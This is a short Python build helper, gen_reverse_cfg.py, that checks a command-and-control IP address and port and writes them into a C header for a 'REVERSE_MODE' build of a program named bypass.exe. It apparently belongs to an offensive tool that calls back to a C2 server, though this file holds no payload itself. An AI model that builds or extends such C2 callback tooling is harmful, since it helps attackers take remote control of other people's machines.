#!/usr/bin/env python3
"""
gen_reverse_cfg.py — generate reverse_cfg.h for REVERSE_MODE builds.

Usage:
    python tools/gen_reverse_cfg.py <C2_IP> <C2_PORT>

Output:
    reverse_cfg.h  in the project root (next to bypass.exe).

Wire-up:
    build.bat reverse 1.2.3.4 4444
       →  python tools/gen_reverse_cfg.py 1.2.3.4 4444
       →  cl ... /DREVERSE_MODE main.c
"""
import sys, os

def main():
    if len(sys.argv) != 3:
        print("Usage: python gen_reverse_cfg.py <C2_IP> <C2_PORT>")
        sys.exit(1)
    ip   = sys.argv[1]
    port = int(sys.argv[2])

    parts = ip.split(".")
    if len(parts) != 4 or not all(0 <= int(p) <= 255 for p in parts):
        print(f"[-] Invalid IP: {ip}")
        sys.exit(1)
    if not (1 <= port <= 65535):
        print(f"[-] Invalid port: {port}")
        sys.exit(1)

    body = (
        f"// Auto-generated by gen_reverse_cfg.py — do not edit by hand.\n"
        f"#ifndef REVERSE_CFG_H\n#define REVERSE_CFG_H\n"
        f"#define REVERSE_TARGET_IP {{{parts[0]},{parts[1]},{parts[2]},{parts[3]}}}\n"
        f"#define REVERSE_TARGET_PORT {port}\n"
        f"#endif\n"
    )

    out = os.path.join(os.path.dirname(__file__), "..", "reverse_cfg.h")
    with open(out, "w", encoding="utf-8") as f:
        f.write(body)
    print(f"[+] reverse_cfg.h: -> {ip}:{port}")

if __name__ == "__main__":
    main()
